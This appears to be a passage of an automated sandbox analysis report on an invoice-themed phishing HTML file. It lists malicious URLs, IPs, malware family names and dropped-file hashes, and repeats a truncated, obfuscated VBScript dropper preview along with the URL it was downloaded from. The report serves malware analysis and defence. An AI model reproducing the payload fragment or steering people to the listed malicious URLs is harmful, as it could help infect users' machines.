 | https://ff-rewards-redeem-codes-org.github.io/Free-Fire-/ | malicious | HTMLPhisher
 | https://www.google.com/url?rct=j&sa=t&url=https://saznao.pl/call/xbjbzvnqyv&ct=ga&cd=CAEYACoTMjk5MjE2NTQ2NzQ3ODY4ODc0NjIaNzRmM2RkZTE1NWFkOWUzMzpjb206ZW46VVM&usg=AOvVaw0lq_nCkEN7dcYMIXCg18TL | malicious | Unknown
 | https://techwormnea.pages.dev/posts/netflix-games-adds-10-new-titles-this-month/ | malicious | Unknown
 | https://welcomewinner.com/?action=register&sub_id=RADIASI-CUBLUK | malicious | Phisher
54.39.128.117 | https://go-pdf.online/abap-development-for-financial-accounting-custom-enhancements.pdf | malicious | Unknown
 | http://beautiful-croquembouche-9e3d8d.netlify.app/ | malicious | HTMLPhisher
 | http://moremashup.com | malicious | Unknown
 | https://links.us1.defend.egress.com/Warning?crId=668c13f0107db9b66b77d74e&Domain=lcatterton.com&Lang=en&Base64Url=eNo1i0FvgyAYQP8NR9FtXpaQhjRNywFNW3TRG6JT6WdhCtL46-elp5eXvDc4Z5dvjEMIUW9MD12kzIT9DIdZOaLRIolDu5J3CcrA5KVax6jbvPNN94jG56_BSgJg_RrM0Fr516J97yVSLTnSU0VHc88FS7PtEXNdfHGtPjLNdtKUD-YzO1dbfb4BF0VS_VzTWvAtn7K1ERYabcsiIL_0hOZrKUOc0OQF7HhfWGyvqlgvF8HifyPiRzE%3D&@OriginalLink=www.google.com | malicious | Unknown
 | https://netflixsignupsa.blogspot.com/ | malicious | HTMLPhisher
 | https://netflix-xfree-watch.blogspot.com/ | malicious | HTMLPhisher
 | https://freefairemsx2022.blogspot.com/ | malicious | HTMLPhisher
 | http://cubiclefoorce.com/?action=register&sub_id=LIGE_ | malicious | Phisher
 | https://claimnow12.finance.blog/cara-credit-union/ | malicious | Unknown
 | https://restartmmberswebsite.uscreen.io/ | malicious | Unknown
156.229.228.198 | faktura_FV2025020637756.html | malicious | Unknown

Match (Domain) | Associated Sample Name / URL | Detection | Threat Name | Context (IP)
s4.histats.com | faktura_FV2025020637756.html | malicious | Unknown | 149.56.240.129
 | http://ww3.0123movies.com.co | malicious | CAPTCHA Scam ClickFix | 54.39.128.162
 | http://68.183.190.199 | malicious | Unknown | 149.56.240.130
 | SUS.ps1 | malicious | Unknown | 142.4.219.198
 | analysis.vbs | malicious | Unknown | 149.56.240.127
 | CfF7MWq7aG.html | malicious | Unknown | 142.4.219.198
 | https://getwellslogsnowonline.vercel.app/ | malicious | Unknown | 149.56.240.132
 | https://fooofooofooo.b-cdn.net/ | malicious | TechSupportScam | 149.56.240.127
 | El3cE5jq1L.pdf | malicious | Unknown | 149.56.240.129
 | http://home45insurance.blogspot.com | malicious | Unknown | 54.39.128.162

Match (ASN) | Associated Sample Name / URL | Detection | Threat Name | Context (IP)
OVHFR | AAHiVVNIKQESryT.exe | malicious | FormBook | 51.222.255.207
 | http://observalgerie.com | malicious | CAPTCHA Scam ClickFix | 37.59.22.41
 | https://saleemitraders.com/wp/confirm.html | malicious | HTMLPhisher, Invisible JS, Tycoon2FA | 158.69.25.207
 | faktura_FV2025020637756.html | malicious | Unknown | 149.56.240.129
 | https://sceanmcommnunmnlty.com/xroea/spwoe/zxiwe | malicious | Unknown | 91.134.10.168
 | http://feirao2025.com.br/consulta/ | malicious | Unknown |
                                                                                    • 91.134.60.128
                                                                                    miori.arm.elfGet hashmaliciousUnknownBrowse
                                                                                    • 142.44.221.81
                                                                                    http://americanlibertywatch.comGet hashmaliciousUnknownBrowse
                                                                                    • 91.134.110.137
                                                                                    WizClient.exeGet hashmaliciousXWormBrowse
                                                                                    • 91.134.10.168
                                                                                    https://www.dkgroup.frGet hashmaliciousUnknownBrowse
                                                                                    • 137.74.137.164
                                                                                    ONL-HKOCEANNETWORKLIMITEDHKfaktura_FV2025020637756.htmlGet hashmaliciousUnknownBrowse
                                                                                    • 156.229.228.198
                                                                                    resgod.arm5.elfGet hashmaliciousMiraiBrowse
                                                                                    • 156.249.107.21
                                                                                    cbr.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                    • 156.249.125.168
                                                                                    nabmpsl.elfGet hashmaliciousUnknownBrowse
                                                                                    • 156.229.163.4
                                                                                    cbr.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                    • 156.249.107.93
                                                                                    armv7l.elfGet hashmaliciousUnknownBrowse
                                                                                    • 45.202.74.234
                                                                                    http://www.car1997.cn/Get hashmaliciousUnknownBrowse
                                                                                    • 45.202.81.19
                                                                                    Hilix.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                    • 156.249.107.33
                                                                                    pXdN91.x68.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                    • 156.229.233.170
                                                                                    gmips.elfGet hashmaliciousUnknownBrowse
                                                                                    • 156.229.232.154
                                                                                    OVHFRAAHiVVNIKQESryT.exeGet hashmaliciousFormBookBrowse
                                                                                    • 51.222.255.207
                                                                                    http://observalgerie.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                    • 37.59.22.41
                                                                                    https://saleemitraders.com/wp/confirm.htmlGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                                    • 158.69.25.207
                                                                                    faktura_FV2025020637756.htmlGet hashmaliciousUnknownBrowse
                                                                                    • 149.56.240.129
                                                                                    https://sceanmcommnunmnlty.com/xroea/spwoe/zxiweGet hashmaliciousUnknownBrowse
                                                                                    • 91.134.10.168
                                                                                    http://feirao2025.com.br/consulta/Get hashmaliciousUnknownBrowse
                                                                                    • 91.134.60.128
                                                                                    miori.arm.elfGet hashmaliciousUnknownBrowse
                                                                                    • 142.44.221.81
                                                                                    http://americanlibertywatch.comGet hashmaliciousUnknownBrowse
                                                                                    • 91.134.110.137
                                                                                    WizClient.exeGet hashmaliciousXWormBrowse
                                                                                    • 91.134.10.168
                                                                                    https://www.dkgroup.frGet hashmaliciousUnknownBrowse
                                                                                    • 137.74.137.164
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    37f463bf4616ecd445d4a1937da06e19ngbtiladkrthgad.exeGet hashmaliciousVidarBrowse
                                                                                    • 54.39.128.117
                                                                                    Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                    • 54.39.128.117
                                                                                    NDQ211216GM08.exe.bin.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • 54.39.128.117
                                                                                    PO-USH3gS.pdf.pif.exeGet hashmaliciousGuLoaderBrowse
                                                                                    • 54.39.128.117
                                                                                    IPt9U27NoX.exeGet hashmaliciousUnknownBrowse
                                                                                    • 54.39.128.117
                                                                                    IPt9U27NoX.exeGet hashmaliciousUnknownBrowse
                                                                                    • 54.39.128.117
                                                                                    justificante de transferencia09454545.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • 54.39.128.117
                                                                                    443_2003_https-df.exeGet hashmaliciousMetasploitBrowse
                                                                                    • 54.39.128.117
                                                                                    443_2003_https-df.exeGet hashmaliciousMetasploitBrowse
                                                                                    • 54.39.128.117
                                                                                    faktura_FV2025020637756.htmlGet hashmaliciousUnknownBrowse
                                                                                    • 54.39.128.117
                                                                                    No context
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):1310720
Entropy (8bit):0.735557597885903
Encrypted:false
SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6VqB:2JIB/wUKUKQncEmYRTwh0q
MD5:655DF1692A261A5F9C38B24097014925
SHA1:382307A069449496FE15D3E1C8562B2F708C6996
SHA-256:CC112AC30D46AFC6335233FC0D443A0B5371D531E458B916EA8CEF4932C326F7
SHA-512:365BEFB1FD1619E445E1DB83FB83A10C97493C4B1F6AEAB67F288D4089FB3EE2EB77D7C2C8C77026CB3A14D4F2DE1A77C106CE388E218E3000EB9A8537FE31EF
Malicious:false
Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

Process:C:\Windows\System32\svchost.exe
File Type:Extensible storage engine DataBase, version 0x620, checksum 0x32dc5043, page size 16384, DirtyShutdown, Windows version 10.0
Category:dropped
Size (bytes):1310720
Entropy (8bit):0.7899734534948286
Encrypted:false
SSDEEP:1536:7SB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:7azaPvgurTd42UgSii
MD5:1D2D99E435E5EBECFEFA81CDE4D008B5
SHA1:A88AD19715F5CAD50E3A49A84CEEA3C38994C8CF
SHA-256:831CD0923A3839B943B3ABC90F0DAB7EE03FD3BE8A659438170FACD5B40C17DF
SHA-512:405BACAC946462FF55E9295FF5EB3E5BFE5B83425457967105DB1F00F4E9FDE3CBD561DB481AF92C2B93D7F81A5AA1C9C8215268B3C3D5019F86C246105B84E7
Malicious:false
Preview:2.PC... ...............X\...;...{......................0.`.....42...{5..9...}..h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{.......................................9...}......................9...}...........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):16384
Entropy (8bit):0.08232479483117672
Encrypted:false
SSDEEP:3:5l8YeFZ7Ag1t/57Dek3JXAmr/ollEqW3l/TjzzQ/t:5l8zFZ7FHR3tXA0Amd8/
MD5:C37449C3E3EA0C8D210BE39656ECF02B
SHA1:DBD64E31C1007A965E640384987C9488BC22B3CB
SHA-256:E9438B75BD61036B2B6B70346054EA8EE6AC791ACCE87B7ADE1A4BCBB2D14D92
SHA-512:F2DC530B32DB4A4E31AC82F4073378239783D973C87ECB62F9D1DF0897139E89C0B8D9180686AAB5F5CA03FA1107B5D5098FB877F11C5360C2ECC83570D855AA
Malicious:false
Preview:k........................................;...{...9...}..42...{5.........42...{5.42...{5...Y.42...{59....................9...}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\SysWOW64\wscript.exe
File Type:ASCII text
Category:dropped
Size (bytes):376
Entropy (8bit):5.175134110355963
Encrypted:false
SSDEEP:6:51DMwYb13LkVVXI8mgO9lVhnmUqZzwGdDVTYqL1+LD+mMkuc1zlCBbAm+RbDRWP/:51DrYb13QvuHnmVZkGdDJH10D+xc15C5
MD5:C2B26B17141E97DA490556030D44F1C3
SHA1:FE0D875538ED94E607D4F3FEFECFC8F797FF3EA9
SHA-256:892D55861A7789EEC2CAD963B875D9EBF537FF3698F08D0349CE86395D224262
SHA-512:67DB732D53C80D1BF30EF6EE75A73ED69ED071AC4E84FF86789A16DFAE810BEF0D2CEF472D6E8624247196334B7F48A65158552FC8A012F968ECDD332A840235
Malicious:false
Preview:_HST_cntval="Initializing..";chfh(_HST_cntval);;!function(){try{var b=document.createElement("script");b.src="//e.dtscout.com/e/?v=1a&pid=5200&site=1&l="+encodeURIComponent(window.location.href)+"&j="+encodeURIComponent(document.referrer);.b.async="async";b.type="text/javascript";var a=document.getElementsByTagName("script")[0];a.parentNode.insertBefore(b,a);}catch(e){}}();

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):5829
Entropy (8bit):4.901113710259376
Encrypted:false
SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
Malicious:false
Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):64
Entropy (8bit):0.34726597513537405
Encrypted:false
SSDEEP:3:Nlll:Nll
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:false
Preview:@...e...........................................................

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\SysWOW64\7za.exe
File Type:ASCII text, with very long lines (14015), with no line terminators
Category:dropped
Size (bytes):14015
Entropy (8bit):3.9102728499186745
Encrypted:false
SSDEEP:384:QmBbwxoxcXU2AJuF97cOtU1hgwuivpiidGugW2Gu:QmFwxoSTAJuFdcuyfpiWGdW2Gu
MD5:BE8C1EE00493E87E2F2B4620F86CCACB
SHA1:6A63A153E6596D90A67138770F5768DD15ADBCF1
SHA-256:C16A1E7CC14C7B9134515A85A9F174A97C8A07CEEBE934CB305DE757E8005B0F
SHA-512:BDAD88DEC5ABFD6B3F34CFF00116502C2735256971F6A76231CB25D7B01A8A6620ADF6B8D2275107411F0E2062F1EBB0D14BC6AA42A34FFC68F216873CA23418
Malicious:true
Preview:wDBRdQvkDPBpkpilJJks = Split("FobLLkfrsr EacbLLkfrsh veMetxuqAFPYyiNziuUbWN IbLLkfrsn SpbLLkfrslit(""-362/bLLkfrs2I-450/bLLkfrs3I-561+333I-213+22I29-175I-122-24I136-285I-489+343I-402+174I132-310I202-361I-226+81I-429/bLLkfrs3I-346+195I89-248I-912/bLLkfrs4I-637+455I-636/4I-420/3I-81-63I-912/4I-606/3I136-364I271-499I-609+381I-531/3I-636/4I-206+62I-193-35I-155+9I202-361I-614+467I-329+148I310-472I-308/2I-703+475I100-299I-170-58I269-462I-523+377I-318/2I-441+278I-202+58I-636/4I-724/4I-66-96I-357+203I-122-37I-483/3I257-401I16-236I-461+235I-604/4I-157+12I-480+340I-604/4I-608/4I130-340I-856/4I-230+90I311-462I-259+107I-609+453I-576/4I-379+235I-197+49I205-431I-475+256I-382+154I-469+267I-317+89I-352+124I-415+187I-207+14I-480+317I-406+254I-397+245I-227-1I-202+56I337-496I-135-12I-724/4I223-385I-308/2I-642/3I-253+72I-256+108I-477/3I-450/3I-440/2I-32-194I161-350I-419+260I-342+198I-678/3I-648/3I33-261I-904/4I-30-126I-193+49I-200+56I-420+272I-134-11I-606/3I-39-174I-852/4I289-434I-449+241I284-498I-38-118I

Process:C:\Windows\SysWOW64\unarchiver.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1499
Entropy (8bit):5.209211003937342
Encrypted:false
SSDEEP:24:mp+L6EOiJliJjWIliJliJUwR1iJfMiJliJFTrp+9iJb/iJup+9iJo69iJniJliJt:mM2GlGblGlGpDGEGlGpriGb/GuiG9Gnv
MD5:46DC3F5EB5800015B14639AFACE154DF
SHA1:8509F1B88BCFBBFA0BC59C7719D7ED845E27418F
SHA-256:6F6D881F5F2A0EF53BBEE47C2B7DDA38A2302842D59D73604F84F2939D8D5DF0
SHA-512:62F571F8CF80652255EA747AC5EC124852007F626F40B3EFFA95C5E7F53D163C1B409AD6A5D2713E9653041D5CF53765441B9CD4D1280534A32E238851CBE99D
Malicious:false
Preview:03/13/2025 9:56 AM: Unpack: C:\Users\user\Downloads\faktura_FV2025020660849.zip..03/13/2025 9:56 AM: Tmp dir: C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg..03/13/2025 9:56 AM: Received from standard out: ..03/13/2025 9:56 AM: Received from standard out: 7-Zip 18.05 (x86) : Copyright (c) 1999-2018 Igor Pavlov : 2018-04-30..03/13/2025 9:56 AM: Received from standard out: ..03/13/2025 9:56 AM: Received from standard out: Scanning the drive for archives:..03/13/2025 9:56 AM: Received from standard out: 1 file, 14147 bytes (14 KiB)..03/13/2025 9:56 AM: Received from standard out: ..03/13/2025 9:56 AM: Received from standard out: Extracting archive: C:\Users\user\Downloads\faktura_FV2025020660849.zip..03/13/2025 9:56 AM: Received from standard out: --..03/13/2025 9:56 AM: Received from standard out: Path = C:\Users\user\Downloads\faktura_FV2025020660849.zip..03/13/2025 9:56 AM: Received from standard out: Type = zip..03/13/2025 9:56 AM: Received from standard out: Physic

                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                    Category:dropped
                                                                                    Size (bytes):7910
                                                                                    Entropy (8bit):3.82235901804059
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:wK4wEBEikjxVyxovvGtp4lMM0Ry2YAoxauF97va+VQ5HuD2IypLFk:7mBbwxoxcXU2AJuF97cOtUW
                                                                                    MD5:3D8472423BE0CC8FAA46C9DACC82B705
                                                                                    SHA1:7EE4F3BB1B772F58A0E0D9E30E44FDA68FF72AA9
                                                                                    SHA-256:BE5B44FF8C9CDA2A064693329829C5F2FDF94FE51AB027AFCC5F68E74F9AB982
                                                                                    SHA-512:F842EC74E5F61FD69B2BA4F22B514FAA72FE7EED7BF6DF6D34DACC65A7B2D4C74C45917D7C80172F3E8869CCBF77F2C476922EA4FB0CDC303483828276846E09
                                                                                    Malicious:false
                                                                                    Preview:PK........iPjZ.+.k.6...6......2025020665304.vbswDBRdQvkDPBpkpilJJks = Split("FobLLkfrsr EacbLLkfrsh veMetxuqAFPYyiNziuUbWN IbLLkfrsn SpbLLkfrslit(""-362/bLLkfrs2I-450/bLLkfrs3I-561+333I-213+22I29-175I-122-24I136-285I-489+343I-402+174I132-310I202-361I-226+81I-429/bLLkfrs3I-346+195I89-248I-912/bLLkfrs4I-637+455I-636/4I-420/3I-81-63I-912/4I-606/3I136-364I271-499I-609+381I-531/3I-636/4I-206+62I-193-35I-155+9I202-361I-614+467I-329+148I310-472I-308/2I-703+475I100-299I-170-58I269-462I-523+377I-318/2I-441+278I-202+58I-636/4I-724/4I-66-96I-357+203I-122-37I-483/3I257-401I16-236I-461+235I-604/4I-157+12I-480+340I-604/4I-608/4I130-340I-856/4I-230+90I311-462I-259+107I-609+453I-576/4I-379+235I-197+49I205-431I-475+256I-382+154I-469+267I-317+89I-352+124I-415+187I-207+14I-480+317I-406+254I-397+245I-227-1I-202+56I337-496I-135-12I-724/4I223-385I-308/2I-642/3I-253+72I-256+108I-477/3I-450/3I-440/2I-32-194I161-350I-419+260I-342+198I-678/3I-648/3I33-261I-904/4I-30-126I-193+49I-200+56I-420+272I-134-11I-606/3I-
                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                    Category:dropped
                                                                                    Size (bytes):14147
                                                                                    Entropy (8bit):3.9604232362411484
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:7mBbwxoxcXU2AJuF97cOtU1hgwuivpiidGugW2Gj:7mFwxoSTAJuFdcuyfpiWGdW2Gj
                                                                                    MD5:29A9EB399DB24ABE418EAB3960EEA15C
                                                                                    SHA1:CDC96AFDA25D062B3E5DEDCB93145B307459DD8D
                                                                                    SHA-256:F7F18704200A83CAAF96CC57E8688CC12FE270B2DBF041DD5B132B0F453CD690
                                                                                    SHA-512:115437BF107D346FB11EDD48B964AF550A6D4CACD76D87FCBFE0FD68C9DDBFA4FB317313659D598409E456D9202E15797B7AD6401D125553F0C819B9A1CE68F7
                                                                                    Malicious:true
                                                                                    Preview:PK........iPjZ.+.k.6...6......2025020665304.vbswDBRdQvkDPBpkpilJJks = Split("FobLLkfrsr EacbLLkfrsh veMetxuqAFPYyiNziuUbWN IbLLkfrsn SpbLLkfrslit(""-362/bLLkfrs2I-450/bLLkfrs3I-561+333I-213+22I29-175I-122-24I136-285I-489+343I-402+174I132-310I202-361I-226+81I-429/bLLkfrs3I-346+195I89-248I-912/bLLkfrs4I-637+455I-636/4I-420/3I-81-63I-912/4I-606/3I136-364I271-499I-609+381I-531/3I-636/4I-206+62I-193-35I-155+9I202-361I-614+467I-329+148I310-472I-308/2I-703+475I100-299I-170-58I269-462I-523+377I-318/2I-441+278I-202+58I-636/4I-724/4I-66-96I-357+203I-122-37I-483/3I257-401I16-236I-461+235I-604/4I-157+12I-480+340I-604/4I-608/4I130-340I-856/4I-230+90I311-462I-259+107I-609+453I-576/4I-379+235I-197+49I205-431I-475+256I-382+154I-469+267I-317+89I-352+124I-415+187I-207+14I-480+317I-406+254I-397+245I-227-1I-202+56I337-496I-135-12I-724/4I223-385I-308/2I-642/3I-253+72I-256+108I-477/3I-450/3I-440/2I-32-194I161-350I-419+260I-342+198I-678/3I-648/3I33-261I-904/4I-30-126I-193+49I-200+56I-420+272I-134-11I-606/3I-
                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                    Category:dropped
                                                                                    Size (bytes):14147
                                                                                    Entropy (8bit):3.9604232362411484
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:7mBbwxoxcXU2AJuF97cOtU1hgwuivpiidGugW2Gj:7mFwxoSTAJuFdcuyfpiWGdW2Gj
                                                                                    MD5:29A9EB399DB24ABE418EAB3960EEA15C
                                                                                    SHA1:CDC96AFDA25D062B3E5DEDCB93145B307459DD8D
                                                                                    SHA-256:F7F18704200A83CAAF96CC57E8688CC12FE270B2DBF041DD5B132B0F453CD690
                                                                                    SHA-512:115437BF107D346FB11EDD48B964AF550A6D4CACD76D87FCBFE0FD68C9DDBFA4FB317313659D598409E456D9202E15797B7AD6401D125553F0C819B9A1CE68F7
                                                                                    Malicious:false
                                                                                    Preview:PK........iPjZ.+.k.6...6......2025020665304.vbswDBRdQvkDPBpkpilJJks = Split("FobLLkfrsr EacbLLkfrsh veMetxuqAFPYyiNziuUbWN IbLLkfrsn SpbLLkfrslit(""-362/bLLkfrs2I-450/bLLkfrs3I-561+333I-213+22I29-175I-122-24I136-285I-489+343I-402+174I132-310I202-361I-226+81I-429/bLLkfrs3I-346+195I89-248I-912/bLLkfrs4I-637+455I-636/4I-420/3I-81-63I-912/4I-606/3I136-364I271-499I-609+381I-531/3I-636/4I-206+62I-193-35I-155+9I202-361I-614+467I-329+148I310-472I-308/2I-703+475I100-299I-170-58I269-462I-523+377I-318/2I-441+278I-202+58I-636/4I-724/4I-66-96I-357+203I-122-37I-483/3I257-401I16-236I-461+235I-604/4I-157+12I-480+340I-604/4I-608/4I130-340I-856/4I-230+90I311-462I-259+107I-609+453I-576/4I-379+235I-197+49I205-431I-475+256I-382+154I-469+267I-317+89I-352+124I-415+187I-207+14I-480+317I-406+254I-397+245I-227-1I-202+56I337-496I-135-12I-724/4I223-385I-308/2I-642/3I-253+72I-256+108I-477/3I-450/3I-440/2I-32-194I161-350I-419+260I-342+198I-678/3I-648/3I33-261I-904/4I-30-126I-193+49I-200+56I-420+272I-134-11I-606/3I-
                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):55
                                                                                    Entropy (8bit):4.306461250274409
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                    Malicious:false
                                                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    File Type:ASCII text
                                                                                    Category:downloaded
                                                                                    Size (bytes):376
                                                                                    Entropy (8bit):5.175134110355963
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:51DMwYb13LkVVXI8mgO9lVhnmUqZzwGdDVTYqL1+LD+mMkuc1zlCBbAm+RbDRWP/:51DrYb13QvuHnmVZkGdDJH10D+xc15C5
                                                                                    MD5:C2B26B17141E97DA490556030D44F1C3
                                                                                    SHA1:FE0D875538ED94E607D4F3FEFECFC8F797FF3EA9
                                                                                    SHA-256:892D55861A7789EEC2CAD963B875D9EBF537FF3698F08D0349CE86395D224262
                                                                                    SHA-512:67DB732D53C80D1BF30EF6EE75A73ED69ED071AC4E84FF86789A16DFAE810BEF0D2CEF472D6E8624247196334B7F48A65158552FC8A012F968ECDD332A840235
                                                                                    Malicious:false
                                                                                    URL:https://s4.histats.com/stats/0.php?4935987&@f16&@g1&@h1&@i1&@vhttps://histats.com/s_opened_TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzEzNC4wLjAuMCBTYWZhcmkvNTM3LjM2
                                                                                    Preview:_HST_cntval="Initializing..";chfh(_HST_cntval);;!function(){try{var b=document.createElement("script");b.src="//e.dtscout.com/e/?v=1a&pid=5200&site=1&l="+encodeURIComponent(window.location.href)+"&j="+encodeURIComponent(document.referrer);.b.async="async";b.type="text/javascript";var a=document.getElementsByTagName("script")[0];a.parentNode.insertBefore(b,a);}catch(e){}}();
                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                    Category:downloaded
                                                                                    Size (bytes):14147
                                                                                    Entropy (8bit):3.9604232362411484
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:7mBbwxoxcXU2AJuF97cOtU1hgwuivpiidGugW2Gj:7mFwxoSTAJuFdcuyfpiWGdW2Gj
                                                                                    MD5:29A9EB399DB24ABE418EAB3960EEA15C
                                                                                    SHA1:CDC96AFDA25D062B3E5DEDCB93145B307459DD8D
                                                                                    SHA-256:F7F18704200A83CAAF96CC57E8688CC12FE270B2DBF041DD5B132B0F453CD690
                                                                                    SHA-512:115437BF107D346FB11EDD48B964AF550A6D4CACD76D87FCBFE0FD68C9DDBFA4FB317313659D598409E456D9202E15797B7AD6401D125553F0C819B9A1CE68F7
                                                                                    Malicious:false
                                                                                    URL:https://filehost200885.info:13621/kqlundqdnblug.php?ZmFrdHVyYV9GVjIwMjUwMjA2NjA4NDk=
